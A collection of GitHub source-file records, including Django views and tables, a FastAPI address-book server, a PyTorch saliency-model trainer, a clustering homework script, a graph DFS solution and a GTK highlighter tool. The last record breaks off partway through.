+{"seq_id":"43389341332","text":"from django.shortcuts import render\nfrom app.models import User\n\n\n# Create your views here.\ndef index(request):\n userlist = User.objects.all()\n if 'uid' in request.session:\n context = {'auth_uid': request.session['uid'], 'users': userlist}\n else:\n context = {'auth_uid': -1, 'users': userlist}\n return render(request, 'index.html', context)\n\n\ndef paranoid_mappings(request):\n context = {}\n return render(request, 'map.json', context, content_type='application/json')\n","repo_name":"irvinlim/paranoid","sub_path":"sample-app/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"73093908706","text":"import click\nimport signal\nimport uvicorn\nfrom fastapi import FastAPI\nfrom pyaddressbook.api.addressbook import get_routes\nfrom pyaddressbook.middleware import add_middleware\nfrom pyaddressbook.repository.addressbook import ContactRepository\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\n\n@click.command()\n@click.option(\n \"--host\",\n \"-h\",\n help=\"host IP address that the server should listen on\",\n type=str,\n default=\"0.0.0.0\",\n)\n@click.option(\n \"--port\", \"-p\", help=\"Port to run API on, defaults to 8000\", type=int, default=8000\n)\ndef main(host: str, port: int):\n engine = create_engine(\"sqlite:///db.sqlite\")\n session_local = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n session = session_local()\n repo = ContactRepository(session)\n\n def close_db_session():\n session.close()\n exit(0)\n\n signal.signal(signal.SIGINT, close_db_session)\n signal.signal(signal.SIGTERM, close_db_session)\n\n app = FastAPI()\n add_middleware(app)\n app.include_router(get_routes(repo), prefix=\"/api\")\n\n uvicorn.run(app, host=host, port=port)\n","repo_name":"gangleri/pyaddressbook","sub_path":"pyaddressbook/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"16609145948","text":"import torch\nfrom collections import OrderedDict\nfrom torch.nn import utils, functional as F\nfrom torch.optim import Adam\nfrom torch.backends import cudnn\nfrom nldf import build_model, weights_init\nfrom loss import Loss\nfrom tools.visual import Viz_visdom\n\n\nclass Solver(object):\n def __init__(self, train_loader, val_loader, test_loader, config):\n self.train_loader = train_loader\n self.val_loader = val_loader\n self.test_loader = test_loader\n self.config = config\n self.mean = torch.Tensor([123.68, 116.779, 103.939]).view(3, 1, 1) / 255\n self.beta = 0.3\n self.device = torch.device('cpu')\n if self.config.cuda:\n cudnn.benchmark = True\n self.device = torch.device('cuda')\n if config.visdom:\n self.visual = Viz_visdom(\"NLDF\", 1)\n self.build_model()\n if self.config.pre_trained: self.net.load_state_dict(torch.load(self.config.pre_trained))\n if config.mode == 'train':\n self.log_output = open(\"%s/logs/log.txt\" % config.save_fold, 'w')\n else:\n self.net.load_state_dict(torch.load(self.config.model))\n self.net.eval()\n self.test_output = open(\"%s/test.txt\" % config.test_fold, 'w')\n\n def print_network(self, model, name):\n num_params = 0\n for p in model.parameters():\n num_params += p.numel()\n print(name)\n print(model)\n print(\"The number of parameters: {}\".format(num_params))\n\n def build_model(self):\n self.net = build_model()\n if self.config.mode == 'train': self.loss = Loss(self.config.area, self.config.boundary)\n self.net = self.net.to(self.device)\n if self.config.cuda and self.config.mode == 'train': self.loss = self.loss.cuda()\n self.net.train()\n self.net.apply(weights_init)\n if self.config.load == '': self.net.base.load_state_dict(torch.load(self.config.vgg))\n if self.config.load != '': self.net.load_state_dict(torch.load(self.config.load))\n self.optimizer = Adam(self.net.parameters(), self.config.lr)\n self.print_network(self.net, 'NLDF')\n\n def update_lr(self, lr):\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = lr\n\n def clip(self, y):\n return torch.clamp(y, 0.0, 1.0)\n\n def eval_mae(self, y_pred, y):\n return torch.abs(y_pred - y).mean()\n\n # TODO: write a more efficient version\n def eval_pr(self, y_pred, y, num):\n prec, recall = torch.zeros(num), torch.zeros(num)\n thlist = torch.linspace(0, 1 - 1e-10, num)\n for i in range(num):\n y_temp = (y_pred >= thlist[i]).float()\n tp = (y_temp * y).sum()\n prec[i], recall[i] = tp / (y_temp.sum() + 1e-20), tp / y.sum()\n return prec, recall\n\n def validation(self):\n avg_mae = 0.0\n self.net.eval()\n for i, data_batch in enumerate(self.val_loader):\n with torch.no_grad():\n images, labels = data_batch\n images, labels = images.to(self.device), labels.to(self.device)\n prob_pred = self.net(images)\n avg_mae += self.eval_mae(prob_pred, labels).cpu().item()\n self.net.train()\n return avg_mae / len(self.val_loader)\n\n def test(self, num):\n avg_mae, img_num = 0.0, len(self.test_loader)\n avg_prec, avg_recall = torch.zeros(num), torch.zeros(num)\n for i, data_batch in enumerate(self.test_loader):\n with torch.no_grad():\n images, labels = data_batch\n shape = labels.size()[2:]\n images = images.to(self.device)\n prob_pred = F.interpolate(self.net(images), size=shape, mode='bilinear', align_corners=True).cpu()\n mae = self.eval_mae(prob_pred, labels)\n prec, recall = self.eval_pr(prob_pred, labels, num)\n print(\"[%d] mae: %.4f\" % (i, mae))\n print(\"[%d] mae: %.4f\" % (i, mae), file=self.test_output)\n avg_mae += mae\n avg_prec, avg_recall 
= avg_prec + prec, avg_recall + recall\n avg_mae, avg_prec, avg_recall = avg_mae / img_num, avg_prec / img_num, avg_recall / img_num\n score = (1 + self.beta ** 2) * avg_prec * avg_recall / (self.beta ** 2 * avg_prec + avg_recall)\n score[score != score] = 0 # delete the nan\n print('average mae: %.4f, max fmeasure: %.4f' % (avg_mae, score.max()))\n print('average mae: %.4f, max fmeasure: %.4f' % (avg_mae, score.max()), file=self.test_output)\n\n def train(self):\n iter_num = len(self.train_loader.dataset) // self.config.batch_size\n best_mae = 1.0 if self.config.val else None\n for epoch in range(self.config.epoch):\n loss_epoch = 0\n for i, data_batch in enumerate(self.train_loader):\n if (i + 1) > iter_num: break\n self.net.zero_grad()\n x, y = data_batch\n x, y = x.to(self.device), y.to(self.device)\n y_pred = self.net(x)\n loss = self.loss(y_pred, y)\n loss.backward()\n utils.clip_grad_norm_(self.net.parameters(), self.config.clip_gradient)\n self.optimizer.step()\n loss_epoch += loss.cpu().item()\n print('epoch: [%d/%d], iter: [%d/%d], loss: [%.4f]' % (\n epoch, self.config.epoch, i, iter_num, loss.cpu().item()))\n if self.config.visdom:\n error = OrderedDict([('loss:', loss.cpu().item())])\n self.visual.plot_current_errors(epoch, i / iter_num, error)\n if (epoch + 1) % self.config.epoch_show == 0:\n print('epoch: [%d/%d], epoch_loss: [%.4f]' % (epoch, self.config.epoch, loss_epoch / iter_num),\n file=self.log_output)\n if self.config.visdom:\n avg_err = OrderedDict([('avg_loss', loss_epoch / iter_num)])\n self.visual.plot_current_errors(epoch, i / iter_num, avg_err, 1)\n img = OrderedDict([('origin', self.mean + x.cpu()[0]), ('label', y.cpu()[0][0]),\n ('pred_label', y_pred.cpu()[0][0])])\n self.visual.plot_current_img(img)\n if self.config.val and (epoch + 1) % self.config.epoch_val == 0:\n mae = self.validation()\n print('--- Best MAE: %.4f, Curr MAE: %.4f ---' % (best_mae, mae))\n print('--- Best MAE: %.4f, Curr MAE: %.4f ---' % (best_mae, mae), file=self.log_output)\n if best_mae > mae:\n best_mae = mae\n torch.save(self.net.state_dict(), '%s/models/best.pth' % self.config.save_fold)\n if (epoch + 1) % self.config.epoch_save == 0:\n torch.save(self.net.state_dict(), '%s/models/epoch_%d.pth' % (self.config.save_fold, epoch + 1))\n torch.save(self.net.state_dict(), '%s/models/final.pth' % self.config.save_fold)\n","repo_name":"AceCoooool/NLDF-pytorch","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"70"}
+{"seq_id":"25231499704","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Roll Number: 22CD91F01\n# Name of the student: Nazeer Haider\n# Project Code: SRHC-AS\n# Project Title: Sales Grouping by Representatives using Single Linkage Agglomerative (Bottom-Up) Clustering Technique\n\n# Import the libraries\nimport numpy as np\nimport pandas as pd\n\n\n# In[2]:\n\n\n# Load the sales data from CSV file\nsales_data = pd.read_csv(\"sales.csv\")\nsales_data = sales_data.sample(1000) # Run on full dataset it takes long time, so I have used just 1000 samples, you can run with full dataset by comment this line\nsales_data.head()\n\n\n# In[3]:\n\n\n# Drop the unnecessary columns from the data\nsales_data = sales_data.drop(\"Record\", axis=1)\n\n\n# In[4]:\n\n\n# In dataset \"Deat ID\" have a mixture of \"Category-Year-ID\". So I have split this column on the basis of \"-\".\n# And you have taken Category and ID, date is already in dataset.\n# new data frame with split value columns\nnew = sales_data[\"Deal ID\"].str.split(\"-\", n = 2, expand = True)\n \n# making separate first name column from new data frame\nsales_data[\"Category\"]= new[0]\n \n# making separate last name column from new data frame\nsales_data[\"ID\"]= new[2]\nsales_data['ID'] = sales_data['ID'].astype(str).astype(int)\n \n# Dropping old Name columns\nsales_data.drop(columns =[\"Deal ID\"], inplace = True)\n \n# df display\nsales_data\n\n\n# In[5]:\n\n\n# Encoding the categorical parameters\nencoded_sales_data = pd.get_dummies(sales_data, columns = ['Country', 'Category', 'Sales Rep'])\nencoded_sales_data\n\n\n# In[6]:\n\n\n# Convert the dataset into numpy array for ease of use\nencoded_sales_data = encoded_sales_data.to_numpy()\n\n\n# In[7]:\n\n\n# Define a function to compute the cosine similarity between two vectors\ndef cosine_similarity(x, y):\n return np.dot(x, y) / (np.linalg.norm(x) * np.linalg.norm(y))\n\n\n# In[8]:\n\n\n# Define a function to compute the mean distance between a sample and all other points in the same cluster\ndef intra_cluster_distance(sample, cluster):\n distances = [cosine_similarity(sample, other) for other in cluster]\n return sum(distances) / len(distances)\n\n\n# In[9]:\n\n\n# Define a function to compute the mean distance between a sample and all other points in the next nearest cluster\ndef nearest_cluster_distance(sample, clusters):\n distances = []\n for other_cluster in clusters:\n if other_cluster == []:\n continue\n intra_distance = intra_cluster_distance(sample, other_cluster)\n distances.append(intra_distance)\n return sum(distances) / len(distances)\n\n\n# In[10]:\n\n\n# Define the K-means clustering algorithm\ndef kmeans_clustering(data, k=3, num_iterations=20):\n # Initialize the cluster means as k distinct data points\n cluster_means = data[np.random.choice(len(data), size=k, replace=False)]\n \n # Perform the iterations\n for i in range(num_iterations):\n # Assign each data point to the nearest cluster\n clusters = [[] for j in range(k)]\n for point in data:\n distances = [cosine_similarity(point, mean) for mean in cluster_means]\n nearest_mean = np.argmax(distances)\n clusters[nearest_mean].append(point)\n # Update the cluster means\n for j in range(k):\n if clusters[j] == []:\n continue\n cluster_means[j] = np.mean(clusters[j], axis=0)\n\n # Assign cluster labels to data points\n kmeans_labels = np.zeros(len(data), dtype=int) # initialize labels as zeros\n for i in range(k):\n cluster_points = clusters[i] # points in the i-th cluster\n for point in cluster_points:\n 
# Find the indices of the points that match the current point in the cluster\n match_indices = np.where(np.all(data == point, axis=1))[0]\n # Assign the current cluster label to the matching points\n kmeans_labels[match_indices] = i\n \n # Compute the Silhouette coefficient\n s_values = []\n for i in range(len(data)):\n a = intra_cluster_distance(data[i], clusters[np.argmax([cosine_similarity(data[i], mean) for mean in cluster_means])])\n b = nearest_cluster_distance(data[i], clusters)\n s = (b - a) / max(a, b)\n s_values.append(s)\n silhouette_coefficient = np.mean(s_values)\n \n return clusters, silhouette_coefficient, kmeans_labels\n\n\n# In[11]:\n\n\n# Save the clustering information to a file\ndef save_cluster(clusters, filename):\n with open(filename, \"w\") as f:\n f.write(f\"{k} Clusters for best k value :\\n\")\n for j, cluster in enumerate(clusters):\n f.write(f\"Cluster {j+1} have {len(cluster)} data points:\\n\")\n f.write(str(sorted(sales_data.index[sales_data[sales_data.columns[-1]] == j].tolist())))\n f.write(\"\\n\\n\")\n\n\n# In[12]:\n\n\n# Find optimal value of k\ns_best = -1\nk_best = -1\nfor k in range(3, 7):\n # K-means clustering\n kmeans_clusters, s, kmeans_labels = kmeans_clustering(encoded_sales_data, k, num_iterations=20)\n\n if s > s_best:\n s_best = s\n k_best = k\n \n sales_data[\"KmeansCluster\"] = kmeans_labels # Add the KmeansCluster column\n save_cluster(kmeans_clusters, \"kmeans.txt\") # Save the kmeans clustering information to a file for best k value\n \n # Print Clusters Info\n print(f\"Clusters for k = {k}:\")\n for j, cluster in enumerate(kmeans_clusters):\n print(f\"Cluster {j+1} have {len(cluster)} data points\")\n print(f\"Silhouette coefficient for k = {k}: {s}\\n\")\n \nprint('Optimal value of k:', k_best)\nsales_data.head(10)\n\n\n# In[13]:\n\n\ndef single_linkage_clustering(X, k):\n \"\"\"Perform single linkage agglomerative clustering using cosine similarity as the distance measure\"\"\"\n n_samples = X.shape[0]\n distances = np.zeros((n_samples, n_samples))\n for i in range(n_samples):\n for j in range(n_samples):\n if i == j:\n continue\n distances[i, j] = 1 - cosine_similarity(X[i], X[j])\n \n # Initialize clusters with each sample as its own cluster\n clusters = [[i] for i in range(n_samples)]\n \n # Merge clusters until the desired number of clusters is reached\n while len(clusters) > k:\n min_distance = np.inf\n merge_indices = (0, 0)\n # Find the two clusters with the smallest distance between them\n for i in range(len(clusters)):\n for j in range(i+1, len(clusters)):\n for c1 in clusters[i]:\n for c2 in clusters[j]:\n distance = distances[c1, c2]\n if distance < min_distance:\n min_distance = distance\n merge_indices = (i, j)\n \n # Merge the two clusters with the smallest distance\n i, j = merge_indices\n clusters[i] += clusters[j]\n del clusters[j]\n \n labels = {}\n for i, cluster in enumerate(clusters):\n for point in cluster:\n labels[point] = i\n agg_labels = [labels[i] for i in range(len(labels))]\n \n return clusters, agg_labels\n\n\n# In[17]:\n\n\n# run agglomerative clustering algorithm\nagg_clusters, agg_labels = single_linkage_clustering(encoded_sales_data, k_best)\n\nsales_data[\"AggCluster\"] = agg_labels # Add the AggCluster column \nsave_cluster(agg_clusters, \"agglomerative.txt\") # Save the agglomerative clustering information to a file for best k value\n\nsales_data.head(10)\n\n\n# In[18]:\n\n\nk = k_best\nkmeans_labels = sales_data['KmeansCluster'].tolist()\nkmeans_labels = np.asarray(kmeans_labels, 
dtype=int)\nagg_labels = np.asarray(agg_labels, dtype=int)\n\n# compute Jaccard similarity\njaccard_similarities = np.zeros((k, k))\nfor i in range(k):\n for j in range(k):\n intersection = len(kmeans_labels[(agg_labels == j) & (kmeans_labels == i)])\n union = len(kmeans_labels[(agg_labels == j) | (kmeans_labels == i)])\n jaccard_similarities[i, j] = intersection / union\nprint(jaccard_similarities)\n\n","repo_name":"N786h/MachineLearning","sub_path":"22CD91F01_SRHC-AS/22CD91F01_SRHC-AS.py","file_name":"22CD91F01_SRHC-AS.py","file_ext":"py","file_size_in_byte":7919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3551232354","text":"# https://www.acmicpc.net/problem/11724\n\nimport sys\n\nsys.setrecursionlimit(10000)\ninput = sys.stdin.readline\n\n\ndef dfs(node):\n visited[node] = 1\n for new_node in graph[node]:\n if visited[new_node]:\n continue\n dfs(new_node)\n\n\nn, m = map(int, input().strip().split(' '))\ngraph = [list() for _ in range(n + 1)]\nfor _ in range(m):\n x, y = map(int, input().strip().split(' '))\n graph[x].append(y)\n graph[y].append(x)\n\nvisited = [0 for _ in range(n + 1)]\nans = 0\nfor node in range(1, n + 1):\n if not visited[node]:\n dfs(node)\n ans += 1\n\nprint(ans)\n","repo_name":"yonghee12/algorithm_study","sub_path":"02_baekjoon/s2_11724_연결 요소의 개수_linked_list.py","file_name":"s2_11724_연결 요소의 개수_linked_list.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9540743158","text":"import cairo\nfrom .tool_pencil import ToolPencil\nfrom .abstract_classic_tool import AbstractClassicTool\n\nclass ToolHighlighter(ToolPencil):\n\t__gtype_name__ = 'ToolHighlighter'\n\n\tdef __init__(self, window, **kwargs):\n\t\t# Context: this is the name of a tool, a thick pencil dedicated to\n\t\t# highlight text, for example in screenshots\n\t\tAbstractClassicTool.__init__(self, 'highlight', _(\"Highlighter\"), \\\n\t\t 'tool-highlight-symbolic', window)\n\t\tself.use_operator = False\n\t\tself._path = None\n\t\tself.add_tool_action_boolean('highlight-alpha', True)\n\t\tself.add_tool_action_boolean('highlight-rigid', True)\n\t\tself.add_tool_action_enum('highlight-bg', 'light')\n\n\tdef get_editing_tips(self):\n\t\tlabel_options = self.label + \" - \"\n\t\tif self._bg_type == 'light':\n\t\t\tlabel_options += _(\"Dark text on light background\")\n\t\t\tlabel_modifier_shift = _(\"Press to temporarily highlight\" + \\\n\t\t\t \" on dark background instead\")\n\t\telse:\n\t\t\tlabel_options += _(\"Light text on dark background\")\n\t\t\tlabel_modifier_shift = _(\"Press to temporarily highlight\" + \\\n\t\t\t \" on light background instead\")\n\t\tif self.get_image().get_mouse_is_pressed():\n\t\t\tlabel_modifier_shift = None\n\n\t\tfull_list = [label_options, label_modifier_shift]\n\t\treturn list(filter(None, full_list))\n\n\tdef on_options_changed(self):\n\t\tsuper().on_options_changed()\n\t\tself._bg_type = self.get_option_value('highlight-bg')\n\t\tself._force_alpha = self.get_option_value('highlight-alpha')\n\t\tself._is_rigid = self.get_option_value('highlight-rigid')\n\t\t# refreshing the rendered operation isn't pertinent\n\n\tdef get_options_label(self):\n\t\treturn _(\"Highlighter options\")\n\n\t############################################################################\n\n\tdef on_press_on_area(self, event, surface, event_x, event_y):\n\t\tself.set_common_values(event.button, event_x, event_y)\n\t\tself._path = None\n\n\t\tself.update_modifier_state(event.state)\n\t\tif 'SHIFT' in self._modifier_keys:\n\t\t\tif self._bg_type == 'light':\n\t\t\t\tself._bg_type = 'dark'\n\t\t\telse:\n\t\t\t\tself._bg_type = 'light'\n\n\tdef _add_point(self, event_x, event_y):\n\t\tcairo_context = self.get_context()\n\t\tif self._path is None:\n\t\t\tcairo_context.move_to(self.x_press, self.y_press)\n\t\telif self._didnt_really_move(cairo_context, event_x, event_y):\n\t\t\tlength = -1\n\t\t\tfor pts in self._path:\n\t\t\t\tif pts[1] == ():\n\t\t\t\t\tcontinue\n\t\t\t\tlength += 1\n\t\t\t\t# a better technique to find the length probably exists\n\t\t\tfor index, pts in enumerate(self._path):\n\t\t\t\tif pts[1] == ():\n\t\t\t\t\tcontinue\n\t\t\t\tif pts[0] == cairo.PathDataType.MOVE_TO:\n\t\t\t\t\tcairo_context.move_to(pts[1][0], pts[1][1])\n\t\t\t\telif index == length:\n\t\t\t\t\tevent_x = (pts[1][0] + event_x) / 2\n\t\t\t\t\tevent_y = (pts[1][1] + event_y) / 2\n\t\t\t\t\tbreak\n\t\t\t\telse: # if pts[0] == cairo.PathDataType.LINE_TO:\n\t\t\t\t\tcairo_context.line_to(pts[1][0], pts[1][1])\n\t\tcairo_context.line_to(event_x, event_y)\n\t\tself._path = cairo_context.copy_path()\n\n\tdef _didnt_really_move(self, cairo_context, event_x, event_y):\n\t\t\"\"\"Tells if the pointer has moved enough to add a new point, otherwise\n\t\tthe last point will be changed.\n\t\tIt's an option that can be disabled.\n\t\tThe context of an highlighter tool means the direction is biased: i will\n\t\tassume the underlying text is written horizontally, and in straight\n\t\tlines; so the 
highlighting will also be straight, but the chosen line\n\t\tmay change during the stroke.\"\"\"\n\t\tcairo_context.append_path(self._path)\n\t\tif not self._is_rigid:\n\t\t\treturn False\n\n\t\trigidity = min(self.tool_width, 10.0)\n\t\tif abs(cairo_context.get_current_point()[0] - event_x) > rigidity:\n\t\t\treturn False\n\t\tif abs(cairo_context.get_current_point()[1] - event_y) > rigidity / 5:\n\t\t\treturn False\n\n\t\tcairo_context.new_path()\n\t\treturn True\n\n\tdef on_motion_on_area(self, event, surface, event_x, event_y, render=True):\n\t\tself._add_point(event_x, event_y)\n\t\tif not render:\n\t\t\treturn\n\t\toperation = self.build_operation()\n\t\tself.do_tool_operation(operation)\n\n\tdef on_release_on_area(self, event, surface, event_x, event_y):\n\t\tself._add_point(event_x, event_y)\n\t\toperation = self.build_operation()\n\t\tself.apply_operation(operation)\n\n\t############################################################################\n\n\tdef build_operation(self):\n\t\toperation = {\n\t\t\t'tool_id': self.id,\n\t\t\t'rgba': self.main_color,\n\t\t\t'width': self.tool_width,\n\t\t\t'path': self._path,\n\t\t\t'bg-type': self._bg_type,\n\t\t\t'halpha': self._force_alpha\n\t\t}\n\t\treturn operation\n\n\tdef do_tool_operation(self, operation):\n\t\tself.start_tool_operation(operation)\n\t\tif operation['path'] is None:\n\t\t\treturn\n\t\tccontext = self.get_context()\n\t\tccontext.set_line_cap(cairo.LineCap.SQUARE)\n\t\tccontext.set_line_join(cairo.LineJoin.ROUND)\n\t\tccontext.set_line_width(operation['width'])\n\n\t\tif operation['bg-type'] == 'light':\n\t\t\toperator = cairo.Operator.MULTIPLY\n\t\telse:\n\t\t\toperator = cairo.Operator.SCREEN\n\t\tccontext.set_operator(operator)\n\n\t\tmain_color = operation['rgba']\n\t\tif operation['halpha']:\n\t\t\tmain_color[3] = 0.5\n\t\tccontext.set_source_rgba(*main_color)\n\n\t\tccontext.append_path(operation['path'])\n\t\tccontext.stroke()\n\n\t############################################################################\n################################################################################\n\n","repo_name":"maoschanz/drawing","sub_path":"src/tools/classic_tools/tool_highlight.py","file_name":"tool_highlight.py","file_ext":"py","file_size_in_byte":5267,"program_lang":"python","lang":"en","doc_type":"code","stars":716,"dataset":"github-code","pt":"70"}
+{"seq_id":"22368349872","text":"import json\nfrom collections\t\t\timport OrderedDict\n\nfrom django.shortcuts\t\t\timport render\nfrom django.utils.safestring\t\timport mark_safe\nfrom django.utils\t\t\timport timezone\nfrom django.utils.timezone\t\timport utc\nfrom django.conf\t\t\timport settings\n\nfrom django.db.models import F\n\nimport\tdjango_tables2 as tables\nfrom django.utils.html import format_html\n\n\nfrom purity.models\t\t\timport pur\nfrom evdisp.models\t\t\timport evdisp\nfrom .models\t\t\t\timport monrun\n\nfrom utils.tpcMap\t\t\timport *\n\n#########################################################\nPlanes = ('U','V','Z')\n\n# ---\nmonchartHitsHeaderURL\t= '%s Hits/RMS '\nmonchartChargeHeaderURL\t= '%s Charge/RMS '\nmonchartRawRmsURL\t= '%s Mean of Raw RMS '\n\n# ---\nmonPatterns = {\n \"hits1\":\t\"Plane %s Mean NHits\",\n \"hits2\":\t\"Plane %s Mean of Hit RMS\",\n \"charge1\":\t\"Plane %s Mean of Charge\",\n \"charge2\":\t\"Plane %s RMS of Charge\",\n \"dead\":\t\"NDead Channels\",\n \"noise1\":\t\"NNoisy Channels 6Sigma away from mean value of the ADC RMS\",\n \"noise2\":\t\"NNoisy Channels Above ADC RMS Threshold\",\n \"meanrawrms\":\t\"Plane %s Mean of Raw RMS\",\n}\n\n\nmonTags = {\n 'apa3':\t'EVENT DISPLAY FOR APA3 ',\n 'evdisp':\t'EVENT DISPLAY ',\n 'femb':\t'FEMB monitor ',\n 'crt':\t'CRT ',\n 'purity':\t'PURITY ',\n}\n\n#########################################################\n# We need this to make links to this service itself.\ntry:\n from django.urls import reverse\nexcept ImportError:\n print(\"FATAL IMPORT ERROR\")\n exit(-3)\n\n\n#########################################################\n#########################################################\n#########################################################\ndef pad0four(input):\n mylist = input.split(',')\n newList = []\n for item in mylist: newList.append('{0:0>4}'.format(item))\n return \",\".join(newList)\n\n######################################################### \n################## LINK UTILS ########################### \n#########################################################\n\ndef makeImageLink(site, evdispURL, j_uuid, run, evnum, datatype, group):\n filename = evdisp.makename(evnum, datatype, group)\n # debug only: print(evnum, datatype, group)\n # debug only: print(\"filename\", filename)\n return \"http://\"+site+\"/\"+evdispURL+\"/\"+j_uuid+\"/\"+filename\n\n\ndef makeEvLink(site, run, evnum):\n return mark_safe('%s ' % (site, run, evnum, evnum))\n\n\n######################################################### \n################### TABLES ############################# \n#########################################################\n\nclass RunTable(tables.Table):\n Run\t= tables.Column()\n ts\t= tables.Column(verbose_name='Time Added to DB')\n evs\t= tables.Column(verbose_name='Event Numbers')\n \n def set_site(self, site=''):\n self.site=site\n class Meta:\n attrs\t= {'class': 'paleblue'}\n\n#---\nclass MonitorTable(tables.Table):\n def set_site(self, site=''):\n self.site=site\n\n def makelink(self, what, key, value):\n return mark_safe('%s '\n % (self.site, reverse(what), key, value, value))\n\n def renderDateTime(self, dt): # common format defined here.\n return timezone.localtime(dt).strftime(settings.TIMEFORMAT)\n\n def modifyName(self, oldName, newName):\n self.base_columns[oldName].verbose_name = newName\n\n#---\nclass PurityTable(MonitorTable):\n def render_tpc(self, value):\n return str(value)+': '+tpcMap[value]\n class Meta:\n model = pur\n attrs = {'class': 'paleblue'}\n#---\nclass 
ShowMonTable(MonitorTable):\n \n# def __init__(self, *args, **kwargs):\n# self.hdr = kwargs.pop('hdr')\n# super(ShowMonTable, self).__init__(*args, **kwargs)\n\n def changeName(self, newName):\n self.base_columns['items'].verbose_name = newName\n\n items = tables.Column()\n\n \n class Meta:\n attrs = {'class': 'paleblue'}\n#---\n#############################################################\n#############################################################\n#############################################################\nclass MonRunTable(MonitorTable):\n def render_run(self, value, record):\n subrun_url = '%s::%s::%s::%s ' % (\n self.site, value, str(record.subrun), str(record.dl), record.jobtype, value, str(record.subrun), str(record.dl), record.jobtype\n )\n output=mark_safe(subrun_url)+' '+record.j_uuid # +' '+str(record.ts.strftime(settings.TIMEFORMAT))\n\n return format_html(output)\n \n # ---\n # we now have the processing type in the metadata (e.g. \"monitor\")\n # which should allow us to simplify the code\n #\n #\n # this is the most important (and crafty) method of all, we parse json\n # and populate tables within the monrun table dynamically\n \n def render_summary(self, value, record):\n # this better be moved to the template...\n output = ''\n \n data = json.loads(value, object_pairs_hook=OrderedDict)\n d = data[0]\n\n monType = None\n try:\n monType = d['Type']\n except:\n pass\n\n # ---\n if monType is None:\n output+='ERROR PARSING JSON
'\n return format_html(output)\n \n # ---\n if monType=='monitor':\n try:\n # column headers for hits and charge\n try:\n for plane in Planes: output+= (monchartHitsHeaderURL)\t% (self.site, plane, plane)\n except:\n pass\n\n try:\n for plane in Planes: output+= (monchartChargeHeaderURL)\t% (self.site, plane, plane)\n except:\n pass\n\n try:\n for plane in Planes:\n testing = d[monPatterns['meanrawrms'] % plane]\n output+= (monchartRawRmsURL) % (self.site, plane, plane)\n except:\n pass\n\n # column headers for dead and noisy channels\n output+=('Dead Channels ') % (self.site)\n output+=('Noisy over 6σ vs over the threshold') % (self.site)\n\n output+='' # ready to add the data to columns\n \n # columns for hits and charge\n try:\n for plane in Planes: output+= ('%s %s ')\t% (d[monPatterns['hits1']\t% plane], d[monPatterns['hits2'] % plane])\n except:\n pass\n \n try:\n for plane in Planes: output+= ('%s %s ')\t% (d[monPatterns['charge1']\t% plane], d[monPatterns['charge2']% plane])\n except:\n pass\n \n try:\n for plane in Planes: output+= ('%s ')\t\t% (d[monPatterns['meanrawrms']\t% plane])\n except:\n pass\n \n # columns for dead and noisy channels\n output+='%s ' % (pad0four(d[\"NDead Channels\"]))\n output+=('%s %s ') % (pad0four(d[\"NNoisy Channels 6Sigma away from mean value of the ADC RMS\"]),pad0four(d[\"NNoisy Channels Above ADC RMS Threshold\"]))\n \n output+=' '\n except:\n output+=' ERROR PARSING JSON '\n\n return format_html(output)\n \n # ---\n if monType=='reco':\n try:\n output+='Number of reconstructed tracks: %s Number of long reconstructed tracks: %s ' % (d['Number of reconstructed tracks'], d['Number of long reconstructed tracks'])\n output+=''\n except:\n output+='ERROR PARSING JSON '\n return format_html(output)\n\n # ---\n try:\n output+=monTags[monType]\n except: \n output+='ERROR LOOKING UP PROCESSING TYPE '\n \n return format_html(output)\n\n\n# Sample summary for the \"reco\" product:\n# [\n# {\n# \"Number of reconstructed tracks\": \"52.80\",\n# \"Number of long reconstructed tracks\": \"19.80\",\n# \"run\": \"run005077_0045_dl08\",\n# \"TimeStamp\": \"Tue Oct 9 05:10:28 2018\",\n# \"Type\": \"reco\"\n# }\n# ]\n\n# Sample summary for the \"monitor\" product:\n# [\n# {\n# \"Plane U Mean NHits\": \"14.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane V Mean NHits\": \"0.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane Z Mean NHits\": \"0.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane U Mean of Charge\": \"139.53,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane V Mean of Charge\": \"0.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane Z Mean of Charge\": \"653.67,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane U RMS of Charge\": \"77.52,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane V RMS of Charge\": \"0.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane Z RMS of Charge\": \"383.14,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane U Mean of Hit RMS\": \"5.02,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane V Mean of Hit RMS\": \"0.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane Z Mean of Hit RMS\": \"4.04,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane U RMS of Hit RMS\": \"1.14,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane V RMS of Hit RMS\": \"0.00,0.00,0.00,0.00,0.00,0.00\",\n# \"Plane Z RMS of Hit RMS\": \"1.85,0.00,0.00,0.00,0.00,0.00\",\n# \"NDead Channels\": \"2432,2560,2560,2560,2560, 0\",\n# \"NNoisy Channels 6Sigma away from mean value of the ADC RMS\": \" 128, 0, 0, 0, 0, 0\",\n# \"NNoisy Channels Above ADC RMS Threshold\": \" 71, 0, 0, 0, 0, 0\",\n# \"run\": \"run003611_0001\",\n# \"TimeStamp\": \"Thu Aug 23 21:03:34 2018\",\n# \"Type\": \"monitor\",\n# 